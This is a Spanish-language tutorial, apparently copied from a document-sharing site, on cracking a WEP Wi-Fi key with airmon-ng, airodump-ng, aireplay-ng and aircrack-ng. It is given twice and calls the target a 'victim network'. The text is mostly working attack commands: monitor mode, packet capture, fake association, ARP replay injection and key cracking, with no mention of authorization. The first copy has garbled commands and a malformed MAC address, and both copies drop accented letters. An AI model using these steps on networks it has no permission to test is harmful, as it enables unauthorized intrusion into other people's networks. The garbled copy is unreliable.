Vous êtes sur la page 1sur 3

Una vez iniciado el SO, abrimos un terminal.

Lo primero es saber el nombre de nuestra interface (Tarjeta Wireless) para


ponerla en modo monitor, para esto escribimos lo siguiente en el terminal:
Airmon-ng
Y nos aparecer el nombre de nuestra interfaz, el chipset y el driver en mi caso
es una el nombre de la interfaz es Wlan0
1* Ya qu conocemos el nombre de nuestra interfaz procedemos a ponerla en
modo monitor y escribimos lo siguiente:
Airmon-ng start wlan0
Ya tenemos nuestra tarjeta en modo monitor (monitor mode enabled on mon0)
y como se podrn dar cuenta mon0 es el nombre de la interfaz en modo
monitor.
2* Ahora vamos a escanear redes disponibles con el siguiente comando:
Airodump-ng mon0
y con esto comenzar a mostrarnos las redes disponibles. Para seleccionar la
red vctima tenemos qu detener el escaneo presionando ctrl+c
3* En este paso vamos a capturar la red vctima para esto escribimos el
siguiente comando:
Airodump-ng -w redes -c 11 bssid 00:22:A4:30E:59 mon0
Donde
-w = especifica el nombre del archivo donde se guarda la captura de datos
-c = especifica el canal de la red
bssid = especifica Mac de punto de acceso
mon0 = especifica la interfaz de la tarjeta de red en modo monitor
4* Abrimos un segundo terminal (sin cerrar la primera) y escribimos lo
siguiente:
Aireplay-ng -1 0 -a 00:22:A4:30E:59 mon0
Esto es para asociar su pc con la red vctima
5* Ahora si viene lo bueno, a inyectar paquetes a la red, para esto tecleamos lo
siguiente:
Aireplay-ng -3 -b 00:22:A4:30E:59 mon0
con esto enviaremos y recibiremos paquetes. Vamos a la primera Terminal y en
la columna #Data se incrementar rapidamente, y esperamos a que llegue a
los 30,000 datos para poder desencriptar la Clave
6* Cuando llegue a los 30,000 datos abrimos una tercera y ltima terminal y
escribimos el famoso comando:
Aircrack-ng redes-01.cap
redes = archivo donde se guarda la captura (.cap) el mismo qu mencionamos
en el paso 3*
Damos enter y empezar a descifrar a la clave y ya est la clave desencintada
Key Found (09:86:23:47:63)

. Paso: Saber el nombre de nuestra interface (Targeta Wireless) para colocar en Modo
Monitor, para esto abrimos una terminal y escribimos lo siguiente:
Cita: Ocultar

airmon-ng
Y nos aparecer el nombre de nuestra interfaz, el chipset y el driver en mi caso es una
el nombre de la interfaz es Wlan0
2. Paso: Ya qu conocemos el nombre de nuestra interfaz procedemos a ponerla en Modo
Monitor y escribimos lo siguiente:
Cita: Ocultar

airmon-ng start wlan0


Ya tenemos nuestra targeta en Modo Monitor (monitor mode enabled on mon0) se podrn
dar cuenta "mon0" es el nombre de la interfaz en modo monitor.
3. Paso: Ahora vamos a escanear redes disponibles con el siguiente comando:
Cita: Ocultar

airodump-ng mon0
y con esto comenzar a mostrarnos las Redes Disponibles. Para seleccionar la Red Vctima
tenemos qu detener el escaneo presionando ctrl+c
4. Paso: En este paso vamos a Capturar la Red Vctima para esto escribimos el siguiente
comando:
Cita: Ocultar

airodump-ng -w redes -c 11 --bssid 00:22:A4:30:FE:59 mon0


donde
-w = especifica el nombre del archivo donde se guarda la captura de datos
-c = especifica el canal de la Red
--bssid = especifica Mac de Punto de Acceso
mon0 = especifica la interfaz de la targeta de Red en Modo Monitor
5. Paso: Abrimos una segunda Terminal (sin cerrar la primera) y escribimos lo
siguiente:
Cita: Ocultar

aireplay-ng -1 0 -a 00:22:A4:30:FE:59 mon0


esto es para Asociar su pc con la Red Vctima
6. Paso: Ahora si viene lo bueno, a inyectar paquetes a la red, para esto
tecleamos lo siguiente:

Cita: Ocultar

aireplay-ng -3 -b 00:22:A4:30:FE:59 mon0


con esto enviaremos y recibiremos paquetes. Vamos a la primera Terminal y en la
columna #Data se incrementar rapidamente, y esperamos a que llegue a los 30,000 datos
para poder desemcriptar la Clave
7. Paso: Cuando llegue a los 30,000 datos abrimos una tercera y ltima Terminal y
escribimos el famoso comando:
Cita: Ocultar

aircrack-ng redes-01.cap
redes =archivo donde se guarda la captura (.cap) el mismo qu mencionamos en el paso 3
damos enter y empezar a decifrar a la clave y Vual Clave desemcriptada
Cita: Ocultar

Key Found (09:86:23:47:63)


- See more at: http://www.identi.li/index.php?topic=117891#sthash.kGFJ7d1w.dpuf

Vous aimerez peut-être aussi